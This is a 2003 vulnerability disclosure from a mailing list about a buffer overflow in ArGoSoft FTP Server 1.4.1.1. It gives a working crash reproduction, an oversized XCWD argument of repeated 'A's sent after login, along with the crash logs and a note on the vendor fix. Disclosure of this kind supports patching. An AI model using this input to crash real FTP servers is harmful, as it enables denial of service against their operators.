argosoft ftp server buffer overflow.

["Moran Zavdi" <moran () moozatech com>]

Hi,

I've found that while using the command XCWD it is possible to overwrite the
server memory and crash it.
to overwrite the servers memory attacker have to do the following:
verify the logging option is off (turned off by default).
successfuly login to the ftp server.
at this point if attacker will issue XCWD command with argument above 4096
chars overflow
will occur.

I tested it on Windows2000 and XP and they both crashed.

I used putty to cause the overflow.. :)
here is what I did.

c:\> putty.exe localhost 21
220 ArGoSoft FTP Server for Windows NT/2000/XP, Version 1.4 (1.4.1.1)
user ftp
502 Unknown command
user ftp
331 User name OK, need password
pass ftp
230 User ftp logged in successfully **
XCWD AAAAAAA....(5000 times)
client closed connection.

the logs look like this:
9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21
9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1
9/22/2003 1:38:49 PM - (     1) 'Error: Access violation at address 00401F32
in module 'ftpsrvnt.exe'. Write of address 41414145

at this point the server will stop working and crash the program.

ArgoSoft Has confirmed its a bug in while passing data using shared memory
that allows attacker to bypass the internal
buffer overflow check of the program.
they Released a new version to fix this issue. version 1.4.1.2.
it can be downloaded from:
http://www.argosoft.com/applications/ftpserver/download.asp


Regards,
Moran Zavdi
Moozatech IT Systems
http://www.moozatech.com